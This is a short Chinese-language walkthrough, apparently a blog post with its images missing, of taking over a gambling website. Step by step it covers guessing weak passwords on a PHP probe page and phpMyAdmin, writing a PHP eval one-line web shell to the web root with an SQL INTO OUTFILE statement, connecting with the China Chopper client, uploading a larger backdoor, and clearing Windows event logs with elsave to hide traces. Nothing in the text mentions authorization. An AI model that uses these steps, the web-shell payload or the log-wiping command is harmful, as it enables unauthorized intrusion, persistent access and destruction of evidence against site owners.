phpmyadmin拿网站shell

开门见山

---

 

1. 找到一个赌博网站，发现存在php探针界面，在下面输入密码尝试用弱口令进行连接，尝试是否成功

 

 

 

失败的结果是这样。

 

 

 

2. 成功！

 

 

 

3. 连接成功的，点击phpMyAdmin管理，进行弱口令登陆，登陆成功了

 

 

 

4. 使用刚才尝试的弱口令进行登陆

 

 

 

6. 成功进入到管理后台中。

 

 

 

7. 执行sql语句，进行插入一句话木马： （ SELECT '<?php @eval($_POST[xxx]);?>'  INTO OUTFILE  'D:/UPUPW_AP5.2/htdocs/xxx.php' ）

 

 

 

8. 目录路径为这个

 

 

 

9. 点击执行，执行成功

 

 

 

10. 使用中国菜刀对一句话进行连接

 

 

 

11. 连接成功

 

 

 

12. 之后上传大马后门

 

 

 

 

 

最后测试完成后，删除大马后门，删除日志

elsave -l 日志类型 -C （application应用程序日志，system系统日志，security安全日志）

 

---